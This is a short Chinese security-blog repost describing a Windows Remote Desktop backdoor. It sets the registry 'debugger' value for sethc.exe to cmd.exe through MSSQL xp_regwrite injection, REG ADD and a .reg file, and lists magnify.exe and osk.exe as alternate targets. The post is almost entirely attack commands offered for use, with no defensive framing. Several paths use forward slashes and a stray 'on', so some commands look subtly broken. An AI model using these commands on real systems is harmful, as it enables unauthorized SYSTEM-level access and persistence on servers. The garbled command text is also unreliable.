3389新思路 's

admin 2017年4月29日15:16:04评论313 views字数 885阅读2分57秒阅读模式
摘要

版权所有:BK瞬间群
作者:BK群某饮料1.能修改注册表
2.能访问3389 regedit/s             导入 .reg 文件进注册表(安静模式)

版权所有:BK瞬间群
作者:BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','REG_sz','c:/windows/system32/cmd.exe on';--

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','REG_sz','';--
REG ADD "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe" /v debugger /t REG_sz /d "c:/windows/system32/cmd.exe" on /f
Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethcasd.exe] "debugger"="c://windows//system32//cmd.exe on"

regedit

/s             导入 .reg 文件进注册表(安静模式)

/e             导出注册表文件

例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM

magnify.exe

osk.exe

sethc.exe

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月29日15:16:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   3389新思路 'shttps://cn-sec.com/archives/45735.html

发表评论

匿名网友 填写信息